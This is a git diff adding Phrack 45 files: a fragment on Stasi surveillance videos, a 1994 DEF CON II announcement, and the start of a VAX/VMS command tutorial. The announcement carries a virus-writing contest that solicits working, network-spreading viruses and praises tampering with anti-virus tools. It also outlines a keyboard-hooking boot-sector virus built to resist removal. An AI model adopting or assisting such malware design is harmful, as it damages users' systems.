+to see on the video, projected behind him, was a pair of hands moving
+around.
+
+  It apparently didn't take much to earn a file in the Stasi archives.
+And once you were in there, the "10 W's:  Wo/wann/warum/mit wem/..."
+("where/when/why/with whom/...") ensured that the file, as well as
+those of your acquaintances, grew.
+
+  The videos reported the following "case studies":
+
+  - The tale of "Eva," whose materialistic lifestyle, contacts with
+Western capitalists, and "Abenteuerromantik" tendencies made her a
+clear danger to the state, as well as a valuable operative.  She swore
+allegiance to the Stasi and was recruited.  Eventually the good working
+relationship deteriorated, and the Stasi had to prevent her from trying
+to escape to the West.  The video showed how the different parts of the
+intelligence service worked together.
+
+  - A member of the military made a call to the consulate of West
+Germany in Hungary.  The list of 10,000 possible travellers to Hungary
+in the relevant time frame was narrowed down to 6,000 on the basis of a
+determination of age and accent from the recorded conversation, then
+down to 80 by who would have any secrets to sell, then down to three
+(by hunch?  I don't remember now).
+
+  One video showed how a subversive was discreetly arrested.  Cameras
+throughout the city were used to track his movements.  When he arrived
+at his home, a few workers were "fixing" the door, which they claimed
+couldn't be opened at the moment.  They walked him over to the next
+building to show him the entrance, and arrested him there.  A dinky
+little East German car comes up, six people pile into it.  Two
+uniformed police stand on the sidewalk pretending nothing is happening.
diff --git a/phrack45/14.txt b/phrack45/14.txt
new file mode 100644
index 0000000..1a2a39a
--- /dev/null
+++ b/phrack45/14.txt
@@ -0,0 +1,551 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Five, File 14 of 28
+
+****************************************************************************
+
+Updated Last : 3.14.1994
+Late Night Hack Announcement #4.2
+
+XXXXXXXXXXXXXXXXXXXXXXXX XX     DEF CON II Convention Update Announcement
+XXXXXXXxxxxXXXXXXXXXXXXXXX XX   DEF CON II Convention Update Announcement
+XXXXXXxxxxxxXXXXXX  X    X      DEF CON II Convention Update Announcement
+XXXXXxxxxxxxxXXXXXXX  X         DEF CON II Convention Update Announcement
+XXXXxxxxxxxxxxXXXX XXXXXXXXX    DEF CON II Convention Update Announcement
+XXXxxxxxxxxxxxxXXXXXXXXXX X     DEF CON II Convention Update Announcement
+XXxxxxxxxxxxxxxxXXXXXX  XX  X   DEF CON II Convention Update Announcement
+XXXxxxxxxxxxxxxXXXXXXXX         DEF CON II Convention Update Announcement
+XXXXxxxxxxxxxxXXXXXXXX X XX     DEF CON II Convention Update Announcement
+XXXXXxxxxxxxxXXXXXXXXXX  XX X   DEF CON II Convention Update Announcement
+XXXXXXxxxxxxXXXXXXXXX X         DEF CON II Convention Update Announcement
+XXXXXXXxxxxXXXXXXXXXXXXXXX      DEF CON II Convention Update Announcement
+XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX DEF CON II Convention Update Announcement
+
+READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE
+
+=============================================================================
+
+What's this?  This is an updated announcement and invitation to DEF CON II,
+a convention for the "underground" elements of the computer culture.  We try
+to target the (Fill in your favorite word here): Hackers, Phreaks, Hammies,
+Virii Coders, Programmers, Crackers, Cyberpunk Wannabees, Civil Liberties
+Groups, CypherPunks, Futurists, Artists, Etc..
+
+WHO:   You know who you are, you shady characters.
+WHAT:  A convention for you to meet, party, and listen to some speeches
+       that you would normally never hear.
+WHEN:  July 22, 23, 24 - 1994 (Speaking on the 23rd and 24th)
+WHERE: Las Vegas, Nevada @ The Sahara Hotel
+
+So you heard about DEF CON I, and want to hit part II?  You heard about the
+parties, the info discussed, the bizarre atmosphere of Las Vegas and want to
+check it out in person?  Load up your laptop muffy, we're heading to Vegas!
+
+Here is what Three out of Three people said about last years convention:
+
+"DEF CON I, last week in Las Vegas, was both the strangest and the best
+computer event I have attended in years." -- Robert X. Cringely, Info World
+
+"Toto, I don't think we're at COMDEX anymore." -- CodeRipper, Gray Areas
+
+"Soon we were at the hotel going through the spoils: fax sheets, catalogs,
+bits of torn paper, a few McDonald's Dino-Meals and lots of coffee grounds.
+The documents disappeared in seconds."  -- Gillian Newson, New Media Magazine
+
+DESCRIPTION:
+
+Last year we held DEF CON I, which went over great, and this year we are
+planning on being bigger and better.  We have expanded the number of
+speakers to included midnight tech talks and additional speaking on Sunday.
+We attempt to bring the underground into contact with "legitimate" speakers.
+Sure it's great to meet and party with fellow hackers, but besides that we
+try to provide information and speakers in a forum that can't be found at
+other conferences.
+
+While there is an initial concern that this is just another excuse for the
+evil hackers to party and wreak havoc, it's just not the case.  People come
+to DEF CON for information and for making contacts.  We strive to distinguish
+this convention from others in that respect.
+
+WHAT'S NEW THIS YEAR:
+
+This year will be much larger and more organized (hopefully) than last year.
+We have a much larger meeting area, and have better name recognition.
+Because of this we will have more speakers on broader topics.  Expect
+speaking to run Saturday and Sunday, ending around 5 p.m.  Some of the new
+things expected include:
+
+> An Internet connection with sixteen ports will be there, _BUT_ will only
+  provide serial connections because terminals are too hard to ship.  So
+  bring a laptop with communications software if you want to connect to the
+  network.  Thanks to cyberlink communications for the connection.
+
+> There will be door prizes, and someone has already donated a Cell Phone
+  and a few "Forbidden Subjects" cd ROMs to give away, thanks to Dead Addict.
+
+> Dr. Ludwig will present his virus creation awards on Sunday.
+
+> A bigger and better "Spot The Fed" contest, which means more shirts to
+  give away.
+
+> More room, we should have tables set up for information distribution.
+  If you have anything you want distributed, feel free to leave it on the
+  designated tables.  Yes, this year there will be a true 24 hour
+  convention space.
+
+> A 24 hour movie / video suite where we will be playing all type of stuff.
+  VHS Format.  Mail me with suggested titles to show, or bring your own.
+  We'll use a wall projector when not in use by speakers.
+
+> Midnight Tech Talks on Friday and Saturday night to cover the more
+  technical topics and leave the days free for more general discussions.
+
+WHO IS SPEAKING:=============================================================
+
+This list represents almost all of the speakers verified to date.  Some
+people do not want to be announced until the event for various reasons, or
+are waiting for approval from employers.  A speaking schedule will go out
+in the next announcement.
+
+
+Philip Zimmerman, Notorious Cryptographer & Author of PGP.
+
+Dr. Ludwig, Author of "The Little Black Book of Computer Viruses," and
+    "Computer Viruses, Artificial Life and Evolution"
+
+Loyd Blankenship (The Mentor), Net Running in the 90's and RPG.
+
+Padgett Peterson, Computer Enthusiast, Anti-Virus Programmer.
+
+The Jackal, A Radio Communications Overview, Digital Radio and the Hack Angle.
+
+Judi Clark, Computer Professionals for Social Responsibility.
+
+Gail Thackery, (Of Operation Sun Devil Fame), Topic to be Announced.
+
+To be Announced, The Software Publishers Association, Topic to be Announced.
+
+Toni Aimes, Ex U.S. West Cellular Fraud, Cellular Fraud Topics.
+
+Mark Lotter, Cellular Enthusiast, Hacking Cell Phones.
+
+Lorax, The Lighter Side of VMBs.
+
+Peter Shipley, Unix Stud, Q&A on Unix Security.
+
+George Smith, Crypt Newsletter, Virus Topic to be Announced.
+
+Cathy Compton, Attorney, Q&A Surrounding Seizure Issues, Etc.
+
+John Littman, Reporter and Author, Kevin Poulson, Mitnick, and Agent Steal.
+
+Red Five & Hellbender, Madmen With a Camcorder, Who Knows?
+
+Erik Bloodaxe, Phrack Editor, Wierd Wireless Psycho Shit.. Stay Tuned..
+
+There should be a few round table discussions on Virus, Cellular, Unix and
+something else surrounding the industry.
+
+I'll name the rest of the speakers as they confirm.  I'm still working on
+a few (Two?) people and groups, so hopefully things will work out and I can
+pass the good news on in the next announcement, or over our List Server.
+
+============================================================================
+
+WHERE THIS THING IS:
+
+It's in Las Vegas, the town that never sleeps.  Really. There are no clocks
+anywhere in an attempt to lull you into believing the day never ends.  Talk
+about virtual reality, this place fits the bill with no clunky hardware.  If
+you have a buzz you may never know the difference.  It will be at the Sahara
+Hotel.  Intel is as follows:
+
+        The Sahara Hotel: 1.800.634.6078
+
+        Room Rates: Single/Double $55, Triple $65, Suite $120
+                    (Usually $200) + 8% tax
+
+        Transportation: Shuttles from the airport for cheap.
+
+   NOTE:  Please make it clear you are registering for the DEF CON II
+   convention to get the room rates.  Our convention space price is
+   based on how many people register.  Register under a false name if
+   it makes you feel better, 'cuz the more that register the better for
+   my pocket book.  No one under 21 can rent a room by themselves, so
+   get your buddy who is 21 to rent for you and crash out.  Try to contact
+   people on the Interactive Mailing List (More on that below) and
+   hook up with people.  Don't let the hotel people get their hands on
+   your baggage, or there is a mandatory $3 group baggage fee.  Vegas
+   has killer unions.
+
+OTHER STUFF:
+
+I'll whip up a list of stuff that's cool to check out in town there so if for
+some reason you leave the awesome conference you can take in some unreal
+sites in the city of true capitalism.  If anyone lives in Las Vegas, I
+would appreciate it if you could send a list of some cool places to check out
+or where to go to see the best shows and I'll post it in the next
+announcement or in the program
+
+-> I am asking for people to submit to me any artwork, pictures, drawings,
+   logos, etc. that they want me to try and include in this years program.
+   I am trying to not violate any copyright laws, but want cool shit.  Send
+   me your art or whatever and I'll try and use it in the program, giving you
+   credit for the work, of course.  Please send it in .TIF format if it has
+   more than eight bit color.  The program will be eight bit black and white,
+-> in case you want to make adjustments on your side.
+
+
+PLEASE DONATE "STUFF" FOR THE GIVEAWAY:
+
+    We are trying to raffle off interesting and old functional items.  If
+you have anything such as old computers, modems, weird radio stuff, books,
+magazines, etc that you want to get rid of, please call or mail me with
+what it is, or bring it along.  I don't want to waste peoples time giving
+away rubber bands or anything, but pretty much anything else will go.
+
+*** NEW MAILING LIST SERVER ***
+
+We've finally gotten Major Domo List Serv software working (Kinda) and it
+is now ready for testing.  MTV spent a lot of time hacking this thing to work
+with BSDi, and I would like to thank him.  The purpose of the list is to
+allow people interested in DEF CON II to chat with one another.  It would
+be very useful for people over 21 who want to rent hotel space, but split
+costs with others.  Just mention you have room for 'x' number of people, and
+I'm sure you'll get a response from someone wanting to split costs.  Someone
+also suggested that people could organize a massive car caravan from Southern
+Ca. to the Con.  My attitude is that the list is what you make of it.  Here
+are the specifics:
+
+Umm.. I TAKE THAT BACK!!  The mailing list is _NOT_ ready yet.  Due to
+technical problems, etc.  I'll do another mass mailing to everyone letting
+them know that the list is up and how to access it.  Sorry for the delay!
+
+
+MEDIA:
+
+Some of the places you can look for information from last year include:
+
+New Media Magazine, September 1993
+InfoWorld, 7-12-1993 and also 7-19-1993 by Robert X. Cringely
+Gray Areas Magazine, Vol 2, #3 (Fall 1993)
+Unix World, ???,
+Phrack #44, #45
+
+COST:
+
+Cost is whatever you pay for a hotel room split however many ways, plus
+$15 if you preregister, or $30 at the door.  This gets you a nifty 24 bit
+color name tag (We're gonna make it niftier this year) and your foot in the
+door.  There are fast food places all over, and there is alcohol all over
+the place but the trick is to get it during a happy hour for maximum
+cheapness.
+
+============================================================================
+
+I wanted to thank whoever sent in the anonymous fax to Wired that
+was printed in issue 1.5  Cool deal!
+
+=============================================================================
+
+FOR MORE INFORMATION:
+
+For InterNet users, there is a DEF CON anonymous ftp site at cyberspace.com
+in /pub/defcon.  There are digitized pictures, digitized speeches and text
+files with the latest up to date info available.
+
+For email users, you can email dtangent@defcon.org for more information.
+
+For non-net people call:
+
+                  ----  A  L  L  I  A  N  C  E  ----
+                           SysOp  Metalhead
+               One Thousand One Hundred Megabytes Online
+              612.251.8596  USRobotics 16.8 Dual Standard
+                   Synchronet Multinode BBS Software
+      International Informational Retrieval Guild (IIRG) Distro Site
+              Electronic Frontier Foundation  (EFF) MEMBER
+            American Bulletin Board Association (ABBA) MEMBER
+-----------------------------------------------------------------------
+ o 200+ Message bases.  No post call ratio.  Nope, not ever.
+ o FidoNet [1:282/8004]
+ o CyberCrime international [69:4612/2]
+ o International Networked message ECHO areas:
+   UFO, VIRUS, REPTILE, MUSIC, Twin Cities Chat, NORML, Telephone Watch,
+   TRADEWARS, MONTE PYTHON, FCC, NO PIRACY, CLASSIFIEDS
+   BBS Software & SYSOP Support, MUSIC, FISHING/HUNTING, Stephen King,
+   Programming, Computers, Foreign Language, iCE/ACiD/TRiBE, COLLEGE
+   LIVING, POLITICS, POETRY, RACISM, and too many more to mention
+ o Computer Underground Magazines, History, Updates & Text
+ o DEF CON Mirrior Archive
+ o uXu, PHANTASY, CuD, EFF Magazine(s) Distro Site
+ o Internet email mailbox (your.name.here@f8004.n282.z1.fidonet.org)
+ o 30 day FULL ACCESS Trial Account...$10/year MEMBERship (sub. to change)
+-----------------------------------------------------------------------
+
+For Snail Mail send to: DEF CON, 2709 E. Madison Street Suite #102,
+                        Seattle, WA, 98112
+
+For Voice Mail and maybe a human (me), 0-700-TANGENT on an AT&T phone.
+
+A DEF CON Mailing list is maintained, and the latest announcements are mailed
+automatically to you.  If you wish to be added to the list just send email
+to dtangent@defcon.org.
+
+=============================================================================
+
+(Note, I have put a copy of Dr. Ludwig's new KOH Data security encryption
+Virus online at the DEF CON ftp site in /pub/defcon/KOH along with full
+documentation.  Get CrAzY.)
+
+
+VIRUS CREATION AWARDS:
+
+                                   Announcing
+                                      The
+                   Second International Virus Writing Contest
+                                  Sponsored by
+                American Eagle Publications, Inc. P.O. Box 41401
+                             Tucson, AZ 85717 USA
+                                      and
+                           The Crypt Infosystems BBS
+                               +1 (818) 683-0854
+
+                                *** The Goal ***
+
+The purpose of this contest is to write a fully functional computer virus that
+entertains people with political satire.  Viruses will be judged on the basis
+of originality, creativity, functionality, and political incorrectness.
+
+                             *** Eligibility ***
+
+               Anyone who can write a computer virus is eligible.
+
+                             *** Contest Dates ***
+
+The contest is underway from January 1, 1994 until June 30, 1994. Your
+submissions must be received by June 30 to qualify. The winner of the
+contest will be announced at the DEFCON conference in Las Vegas, July 22-24,
+1994. If you can be present, an official award will be bestowed on you at
+that time.
+
+         *************************************************************
+
+                                    Details
+
+         *************************************************************
+
+The philosopher Friedrik Nietzsche once said that if you want to kill
+something, you must laugh at it--and laugh at it deeply. So there should be
+little wonder that political satire is as old as politics itself.
+
+Is there something going on in the political arena that you abhor, that makes
+you sick, that is just plain wrong? Well, here's your chance to make a
+mockery of it. I've always had this idea that if someone wrote a sufficiently
+witty virus that really addressed the issues the way the people (not the
+press, not the politicians) saw them, it might just get passed around by
+people voluntarily.
+
+Let's find out.
+
+Write a virus that is itself a political satire. I don't mean a virus that
+simply displays a message. I mean a living entity whose every move--whose
+every action--is politically motivated. If you need more than one virus to
+make your point--perhaps two viruses working together, or something like that,
+that is fine.
+
+         -----------------------------------------------------------
+Let me give you a simple example: The Political Correctness Virus
+
+This virus is a spoof on the "political correctness" movement--which is just
+a form of self-imposed censorship--that is sweeping American intellectual
+circles, particularly colleges and universities.
+
+This virus is a memory resident boot sector virus which maintains a list of
+politically incorrect words on your computer system. It also hooks the
+keyboard interrupt and monitors every keystroke you make. If you type a
+politically incorrect word into the computer, the PCV springs into action.
+
+Politically incorrect words are ranked at three different offense levels.
+When the PCV encounters such a word, it determines what offense level that
+word is, and acts accordingly.
+
+The least offensive words merely register a beep. More offensive words cause
+a beep to sound for 10 seconds. The most offensive words cause a siren to
+sound for two minutes, locking the system for that duration. If you turn the
+computer off before the two minutes are up, the virus will stop the boot
+process for five minutes, with sirens, when you turn it back on. If you allow
+the siren to complete, then you can proceed.
+
+The virus has two different word lists, both stored in an encrypted and
+compressed format. The list is selected at random when the system is
+infected, after which it cannot be changed. The first list is the "proper"
+list of political correctness no-no's. For example, a word like "sodomite" is
+among the worst possible offenses. The second list is an inverted list of
+no-no's.  This list trys to force you to use "sodomite" by flagging words
+like "gay" and "homosexual" as no-no's.
+
+If you allow the PCV to live in your system for three months without getting
+a single flag, you are given the supreme honor of viewing the word list
+assigned to you and adding a word to it. If you get more than 3000 flags in
+a lifetime, the virus will force you to enter a politically correct word
+before allowing you to start the computer, since you are obviously unwilling
+to submit to its censorship.
+
+The virus also uses powerful means to prevent disinfection, so that, once you
+get it, you can't get rid of it without a major effort.
+
+         ------------------------------------------------------------
+
+Now, I know you can get a lot more creative than this--so do it! Design your
+virus carefully, so that everything it does has meaning. Then send it in.
+
+Here are the criteria we'll use:
+
+1. Originality: Your virus must be an original work. Do not send us anything
+that is not 100% yours. Your message should be original too. Do not just
+ape what everybody else is saying, especially the media. Also, a refined wit
+is much to be preferred over vulgarity. Vulgarity is a substitute for
+original wit. Foul language, porn, etc., are out. Destructive features should
+be incorporated only if they are VERY appropriate (perhaps if you are
+commenting on real live genocide in your country, or something like that).
+In general, though, destructive features will hurt you, not help you. The one
+exception is modifying anti-virus programs. That is considered to be
+CONstructive activity.
+
+2. Creativity: Make us laugh, make us cry. Amaze us with how bits and bytes
+can say something about politics and issues.  Think of it like this:
+displaying a message on the screen is like reading a text file. What we want
+is the equivalent of a multi-media extravaganza. Use all the system's
+resources to tell your message. Don't be afraid to write a virus that has
+some weird mode of infecting programs that tells a story, or to write one
+that sends faxes to the White House, or sends an automatic request for reams
+of free information to some government agency.
+
+3. Functionality: The virus has to work. If it only works on some machines,
+or under some versions of DOS, or what-not, then that will count against
+you. The better it is at infecting systems and moving around, the better off
+you will be. So, for example, if you write a file-infector, make sure it can
+jump directories, and--if you're up to it--migrate across a network.
+
+4. Political incorrectness: Since computer viruses are politically incorrect,
+their message should be too. If you send us a pro-establishment virus, then
+you will not win this contest. A word to the wise: think twice about what's
+correct and what's not. Many positions are only superficially incorrect,
+though they are really quite fashionable among the establishment. Look at it
+this way: if you could get a well-written letter expressing your view
+published in a big city newspaper, then it's not sufficiently incorrect.
+There are a LOT of ideas that are unofficially censored by society--
+especially the media and academia. They tend to make themselves out to be the
+rebels, but they are really the establishment. If you can't think of anything
+creatively incorrect and sufficiently obnoxious then you shouldn't be writing
+viruses in the first place.
+
+         *************************************************************
+
+                             How to Submit an Entry
+
+You may mail your entry to American Eagle Publications at the above address,
+or you may e-mail it to ameagle@mcimail.com. Alternatively, you can submit it
+by dialing the Crypt Infosystems BBS and uploading it there. To get on to the
+system quickly, efficiently and anonymously, log on as VIRUS, using the
+password CONTEST.
+
+An entry consists of:
+
+1. A complete copy of your virus, both source and executable files.
+
+2. If the political satire isn't perfectly obvious, send a verbal description
+of how the virus works and why it does what it does. This is especially
+important if you are not an American and you are commenting on something that
+has not received worldwide attention. I don't care if you're Bulgarian and
+you're commenting on something we've never heard of--just make sure you
+explain it, or we won't understand and you'll lose.
+
+3. If you want to be recognized for your work, include your name (real or
+handle), and a way we can get in contact with you.
+
+By submitting an entry, you grant American Eagle Publications, Inc. the right
+to publish your virus in any form. You agree not to make your virus public
+prior to July 25, 1994. If you do, you are automatically disqualified from
+the contest.
+
+For the sake of privacy, you may encrypt your entry and send it in with the
+following PGP key (which we highly recommend if you have PGP):
+
+    -----BEGIN PGP PUBLIC KEY BLOCK-----
+    Version: 2.1
+
+    mQCNAi09jVgAAAEEAN3M9LFQXeBprkZuKo5NtuMC+82qNd3/8saHLO6iuGe/eUai
+    8Vx7yqqpyLjZDGbAS7bvobrcY3IyFeu8PXG4T8sd+g81P0AY0PHUqxxPG3COvBfP
+    oRd+79wB66YCTjKSwd3KVaC7WG/CyXDIX5W6KwCaGL/SFXqRChWdf2BGDUCRAAUR
+    tApDT05URVNUXzk0
+    =Z20c
+    -----END PGP PUBLIC KEY BLOCK-----
+
+Good luck!
+
+         ****************************************************************
+
+                                  P R I Z E S
+
+In addition to instant worldwide fame and recognition, you'll get:
+
+1. A cash prize of $100 US.
+
+2. A year's subscription to Computer Virus Developments Quarterly.
+
+3. Your virus will be published in Computer Virus Developments Quarterly,
+and other fine journals.
+
+4. A handsome engraved plaque recognizing your contribution to the betterment
+of mankind.
+
+5.  A free secret surprise that we cannot tell you about right now, valued
+at $100.
+
+Two runner-ups will receive the secret surprise.
+
+                                !!  GO FOR IT !!
+
+
+=============================================================================
+
+STUFF TO SPEND YOUR MONEY ON:
+
+> Tapes of last years speakers (four 90 minute tapes) are available for $20
+
+> DEF CON I tee-shirts (white, large only) with large color logo on the
+  front, and on the back the Fourth Amendment, past and present.  This is
+  shirt v 1.1 with no type-o's.  These are $20, and sweatshirts are $25.
+
+> DEF CON II tee-shirts will be made in various colors this year, including
+  a few long sleeve shirts.  Sizes will be in XL only again, with few white
+  larges made.  Shirts will be $15, Long Sleeve $17, Sweat shirts will be $20.
+  Well, actually, I'll make a small quantity of various stuff, so with luck
+  you'll find something you like.
+
+> We will have a few (ten maybe?) embroidered hats with this years logo.
+  Not sure how much they will be.. like $10 maybe.
+
+> Full sized 4 color DEF CON II wall posters will be for sale for about $5.
+
+> Pre-Register for next year in advance for $15 and save half.
+
+> Make all checks/money orders/etc. out to DEF CON, and mail to the address
+  above.  Way above.  Above the virus awards announcement.
+
+If you have any confidential info to send, use this PGP key to encrypt:
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.3
+
+mQCrAiyI6OcAAAEE8Mh1YApQOOfCZ8YGQ9BxrRNMbK8rP8xpFCm4W7S6Nqu4Uhpo
+dLfIfb/kEWDyLreM6ers4eEP6odZALTRvFdsoBGeAx0LUrbFhImxqtRsejMufWNf
+uZ9PtGD1yEtxwqh4CxxC8glNA9AFXBpjgAZ7eFvtOREYjYO6TH9sOdZSa8ahW7YQ
+hXatVxhlQqve99fY2J83D5z35rGddDV5azd9AAUTtCZUaGUgRGFyayBUYW5nZW50
+IDxkdGFuZ2VudEBkZWZjb24ub3JnPg==
+=ko7s
+-----END PGP PUBLIC KEY BLOCK-----
+
+- The Dark Tangent
diff --git a/phrack45/15.txt b/phrack45/15.txt
new file mode 100644
index 0000000..65ca360
--- /dev/null
+++ b/phrack45/15.txt
@@ -0,0 +1,821 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Five, File 15 of 28
+
+****************************************************************************
+
+                        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+                        Some Helpful VAX/VMS utilities
+
+                        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+Introduction :
+^^^^^^^^^^^^
+This article contains a brief introduction to some not so often used
+utilities, found on the Virtual Address eXtentions/ Virtual Memory System or
+better known to us as the VAX/VMS.
+
+Please note that this file is meant for the so called VMS "newbies". It gives
+an insight to the processes that are running in the different "Hibernation"
+states on VMS, quite similar to the background processes running on UNIX and
+its clones. If you have "extensive" experience on VMS as a systems programmer
+or a SysOp, you might want to skip it !!
+
+Portions of this file are taken from the ever blabbering VMS HELP, which is
+where many of us, myself included, learn about the VAX/VMS. VMS has lots of
+secrets. Locations of "hidden" files are a very well kept secret, known
+not even to the SysOp but only to the system programmer.
+
+Ok.... Lets get started...
+
+
+SHOW SYSTEM   :
+^^^^^^^^^^^
+This command ($Show system) will display information about the
+status of the processes running on the system.
+There are various options to this command, some of which are listed below.
+
+
+    /BATCH     /CLUSTER   /FULL      /NETWORK   /NODE      /OUTPUT
+    /PROCESS   /SUBPROCESS
+
+
+
+
+         1.  $ SHOW SYSTEM
+
+       VAX/VMS 5.4  on node DARTH 19-APR-1990 17:45:47.78  Uptime  2 21:53:59
+         Pid    Process Name   State Pri      I/O       CPU  Page flts Ph.Mem
+       27400201 SWAPPER        HIB   16        0  0 00:29:52.05      0      0
+       27401E03 DOCBUILD       LEF    4    37530  0 00:05:47.62  96421    601
+       27402604 BATCH_789      LEF    4     3106  0 00:00:48.67   4909   2636 B
+       27401C05 BATCH_60       LEF    6      248  0 00:00:06.83   1439   1556 B
+       27400207 ERRFMT         HIB    8     6332  0 00:00:41.83     89    229
+       27400208 CACHE_SERVER   HIB   16     2235  0 00:00:05.85     67    202
+       27400209 CLUSTER_SERVER HIB    8     4625  0 00:22:13.28    157    448
+       2740020C JOB_CONTROL    HIB   10   270920  0 01:07:47.88   5163   1384
+       2740020D CONFIGURE      HIB    9      125  0 00:00:00.53    104    264
+        .
+        .
+        .
+       27400E8D Sir Lancelot   LEF    5      226  0 00:00:07.87   4560    697
+       2740049A Guenevere      LEF    4      160  0 00:00:02.69    534    477
+       27401EA0 BATCH_523      CUR  4 4    17470  0 03:25:49.67   8128   5616 B
+       274026AF GAWAIN         CUR  6 4    14045  0 00:02:03.24  20032    397
+       274016D5 GAHERIS        LEF    6      427  0 00:00:09.28   5275   1384
+       27401ED6 knight_1       HIB    5      935  0 00:00:10.17   3029   2204 S
+       274012D7 BATCH_689      LEF    4    49216  0 00:14:18.36   7021   3470 B
+       274032D9 DECW$MAIL      LEF    4     2626  0 00:00:51.19   4328   3087 B
+       274018E3 SERVER_0021    LEF    6      519  0 00:00:07.07   1500    389 N
+       274016E8 NMAIL_0008     HIB    4    10955  0 00:00:55.73   5652    151
+       274034EA MORDRED        LEF    4     2132  0 00:00:23.85   5318    452
+       274022EB S. Whiplash    CUR  6 4      492  0 00:00:12.15   5181    459
+       274018EF DwMail         LEF    5   121386  0 00:28:00.97   7233   4094
+       27401AF0 EMACS$RTA43    LEF    4    14727  0 00:03:56.54   8411   4224 S
+       27400CF4 TRISTRAM       HIB    5    25104  0 00:06:07.76  37407   1923
+       274020F5 Morgan         LEF    7    14726  0 00:02:10.74  34262   1669
+       27400CF6 mr. mike       LEF    9    40637  0 00:05:15.63  18454    463
+
+           The information in this example includes the following:
+
+            o Process identification (PID) code-A 32-bit binary value that
+              uniquely identifies a process.
+
+            o Process name-A 1- to 15-character string used to identify a
+              process.
+
+            o Process state-The activity level of the process, such as COM
+              (computing), HIB (hibernation), LEF (local event flag) wait,
+              or CUR (if the process is current). If a multiprocessing
+              environment exists, the display shows the CPU ID of the
+              processor on which any current process is executing.
+
+              Note that the SHOW SYSTEM command examines the processes on
+              the system without stopping activity on the system. In this
+              example process information changed during the time that the
+              SHOW SYSTEM command collected the data to be displayed. As
+              a result, this display includes two processes, named GAWAIN
+              and S. Whiplash, with the state CUR on the same CPU, CPU ID
+              6 in the example.
+
+            o Current priority-The priority level assigned to the process
+              (the higher the number, the higher the priority).
+
+            o Total process I/O count-The number of I/O operations
+              involved in executing the process. This consists of both
+              the direct I/O count and the buffered I/O count.
+
+            o Charged CPU time-The amount of CPU time that a process has
+              used thus far.
+
+            o Number of page faults-The number of exceptions generated by
+              references to pages that are not in the process's working
+              set.
+
+            o Physical memory occupied-The amount of space in physical
+              memory that the process is currently occupying.
+
+            o Process indicator-Letter B indicates a batch job; letter
+              S indicates a subprocess; letter N indicates a network
+              process.
+
+            o User identification code (UIC)-An 8-digit octal number
+              assigned to a process. This number is displayed only if the
+              /FULL qualifier is specified.
+
+
+
+         2.  $ SHOW SYSTEM /CLUSTER
+
+
+       VAX/VMS V5.4 on node APPLE 19-APR-1990 09:09:58.61  Uptime    0 2:27:11
+       Pid       Process Name   State  Pri I/O  CPU           Page flts Ph. Mem
+       31E00041  SWAPPER        HIB    16    0  0 00:00:02.42     0       0
+       31E00047  CACHE_SERVER   HIB    16   58  0 00:00:00.26    80      36
+       31E00048  CLUSTER_SERVER CUR     9  156  0 00:00:58.15  1168      90
+       31E00049  OPCOM          HIB     7 8007  0 00:00:33.46  5506     305
+       31E0004A  AUDIT_SERVER   HIB     9  651  0 00:00:21.17  2267      22
+       31E0004B  JOB_CONTROL    HIB    10 1030  0 00:00:11.02   795     202
+
+          .
+          .
+
+           The SHOW SYSTEM command in this example shows all processes on
+           all nodes of the cluster.
+
+
+         3.  $ SHOW SYSTEM /NODE=NEON
+       VAX/VMS V5.4 on node NEON 19-APR-1990 09:19:15.33  Uptime    0 02:29:07
+       Pid       Process Name   State  Pri  I/O  CPU           Page flts Ph. Mem
+       36200041  SWAPPER        HIB    16     0  0 00:00:12.03     0       0
+       36200046  ERRFMT         HIB     8   263  0 00:00:05.89   152      87
+       36200047  CACHE_SERVER   CUR    16     9  0 00:00:00.26    80      51
+       36200048  CLUSTER_SERVER CUR     8    94  0 00:00:30.07   340      68
+       36200049  OPCOM          HIB     6  2188  0 00:02:01.04  1999     177
+       3620004A  AUDIT_SERVER   HIB    10   346  0 00:00:10.42  1707      72
+          .
+          .
+          .
+
+
+           The SHOW SYSTEM command in this example shows all processes on
+           the node NEON.
+
+
+                               ----- X -----
+
+   So now that we beat the SHOW SYSTEM command to death, lets take on another
+   command. Hmmm..let's see..Ahhhaaaa the MONITOR SYSTEM !!!!!
+
+   This is a pretty neat command and one of my favorite "play" commands. Don't
+   get me wrong, there's a lot to be learned from "play" commands like these.
+   It really gives us some useful information. The reason why I like this
+   utility is because it gives a GRAPHICAL representation of the
+   data given by the SHOW SYSTEM. I would have included a short example
+   of the graphics, but not everyone receiving this article would be running
+   VMS on a terminal with ANSI emulation. So, if you want to see the ANSI
+   graphics, follow my instructions...
+
+
+MONITOR
+
+   Invokes  the  VMS  Monitor  Utility  (MONITOR)  to  monitor  classes  of
+   system-wide  performance  data   at  a  specified  interval.  It produces
+   three types of optional output:
+
+      o  Recording file
+      o  Statistical terminal display
+      o  Statistical summary file
+
+   You  can collect data from a running system or from a previously created
+   recording file.
+
+   You can execute a single  MONITOR request,  or enter MONITOR interactive
+   mode to execute a series of requests.  Interactive mode is entered  when
+   the MONITOR command is issued with no parameters or qualifiers.
+
+   A MONITOR request can be terminated by pressing CTRL/C or CTRL/Z. CTRL/C
+   causes MONITOR to enter interactive mode; CTRL/Z returns to DCL.
+
+
+   The  MONITOR  Utility  is described in detail in the VMS Monitor Utility
+   Manual.
+
+   Format:
+          MONITOR  class-name[,...]
+
+   There are quite a few different options available for the MONITOR utility.
+   We are not going to get into too much detail about each option, but I will
+   take the time to discuss a few. The different options for MONITOR are....
+
+  ALL_CLASSES           CLUSTER    DECNET     DISK       DLOCK      FCP
+  FILE_SYSTEM_CACHE     IO         LOCK       MODES      MSCP_SERVER
+  PAGE       POOL       PROCESSES  RMS        SCS        STATES     SYSTEM
+  TRANSACTION           VECTOR
+  /BEGINNING /BY_NODE   /COMMENT   /DISPLAY   /ENDING    /FLUSH_INTERVAL
+  /INPUT     /INTERVAL  /NODE      /RECORD    /SUMMARY   /VIEWING_TIME
+  /ALL       /AVERAGE   /CPU       /CURRENT   /FILE      /ITEM      /MAXIMUM
+
+
+     MONITOR Parameter class-name[,...]
+
+      Specifies one or more classes of performance data to be monitored.
+      The available class-names are:
+
+          ALL_CLASSES       All MONITOR classes.
